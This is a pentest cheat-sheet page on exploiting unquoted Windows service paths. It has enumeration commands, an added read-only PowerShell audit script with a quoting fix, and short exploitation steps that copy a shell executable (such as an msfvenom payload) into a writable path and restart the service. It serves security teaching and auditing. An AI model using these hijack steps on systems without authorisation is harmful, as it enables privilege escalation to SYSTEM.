killchain-compendium/Exploits/Windows/Unquoted Path.md


Unquoted Path

  • A service whose binary path contains spaces but is not quoted can be hijacked by placing another executable earlier in that path.
  • Some part of the path has to be writeable: when the path is unquoted, Windows treats each space as a possible end of the executable name and tries the prefix with .exe appended (C:\Program.exe, C:\Program Files\Unquoted.exe, ...) before reaching the real binary.
  • Check services via wmic service get name,displayname,pathname,startmode and sc qc <servicename>
  • Check permissions on the path components via .\accesschk64.exe /accepteula -uwdq "C:\Service Path\"

Enumeration

  • Check paths
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
  • Check permissions on these paths
cacls "c:\program files\directory"
powershell -c "Get-WMIObject -Class Win32_Service -Filter \"Name='<service name>'\" | select-object *"
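
The enumeration above can be done in one pass. The following audit script is an added example, not part of the compendium: it lists every service whose image path is unquoted and contains spaces, works out each prefix Windows would try as an executable, and reports whether the directory holding that prefix grants write access to broad principals or the current user. It assumes it is run in an unelevated PowerShell session on the host being audited; the ACL check is an approximation (it ignores Deny entries and inherited group membership).

```powershell
# Added audit script (not from the original compendium). Read-only: it never
# creates files, it only inspects Win32_Service and directory ACLs.

function Test-DirectoryWritable {
    param([string]$Directory)
    # Approximation: an Allow ACE granting write-class rights to Everyone,
    # Users, Authenticated Users or the current account. Deny ACEs and nested
    # group membership are not evaluated, so treat hits as leads, not proof.
    $broad = 'Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users',
             "$env:USERDOMAIN\$env:USERNAME"
    $acl = Get-Acl -LiteralPath $Directory -ErrorAction SilentlyContinue
    if (-not $acl) { return $false }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($broad -notcontains $ace.IdentityReference.Value) { continue }
        if ($ace.FileSystemRights -match 'Write|Modify|FullControl|CreateFiles') {
            return $true
        }
    }
    return $false
}

function Get-UnquotedServicePath {
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $svc  = $_
        $path = $svc.PathName
        # Skip services with no path, an already quoted path, or no spaces.
        if (-not $path -or $path.StartsWith('"') -or $path -notmatch ' ') { return }
        # Drop any arguments after the executable (best effort: cut at .exe).
        $exe = ($path -split '\.exe')[0] + '.exe'
        if ($exe -notmatch ' ') { return }
        # Every space in the path yields one candidate executable Windows tries.
        $parts = $exe -split ' '
        for ($i = 1; $i -lt $parts.Count; $i++) {
            $candidate = ($parts[0..($i - 1)] -join ' ') + '.exe'
            $dir = Split-Path -Path $candidate -Parent
            if (-not (Test-Path -LiteralPath $dir)) { continue }
            [pscustomobject]@{
                Service   = $svc.Name
                StartMode = $svc.StartMode
                ImagePath = $exe
                Candidate = $candidate
                Writable  = Test-DirectoryWritable -Directory $dir
            }
        }
    }
}

# Example run: show only the candidates whose directory looks writable.
Get-UnquotedServicePath | Where-Object Writable | Format-Table -AutoSize
```

Any service reported here is fixed by quoting its image path, for example sc.exe config <servicename> binPath= "\"C:\Program Files\Vendor App\svc.exe\"" (the space after binPath= is required by sc.exe).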

Example

  • The unquoted path is C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe, so Windows tries C:\Program.exe, C:\Program Files\Unquoted.exe and C:\Program Files\Unquoted Path Service\Common.exe before the real binary; the last of these sits in a writeable directory:
copy C:\shell.exe "C:\Program Files\Unquoted Path Service\Common.exe"
net start <service>

Intel about Service

  • The Access entries should show write rights (Write, Modify or FullControl) for a principal you control:
Get-Acl -Path <path> | Format-List
  • Save the script Get-ServiceAcl.ps1 and load it with Import-Module .\Get-ServiceAcl.ps1

  • Check ServiceRights via

"<servicename>" | Get-ServiceAcl | Select-Object -ExpandProperty Access

Interacting with the Service

  • Upload the msfvenom shell to the writeable path, set up a listener, then start or restart the service:
sc start "servicename"
Stop-Service -name "servicename"
Start-Service -name "servicename"

PoC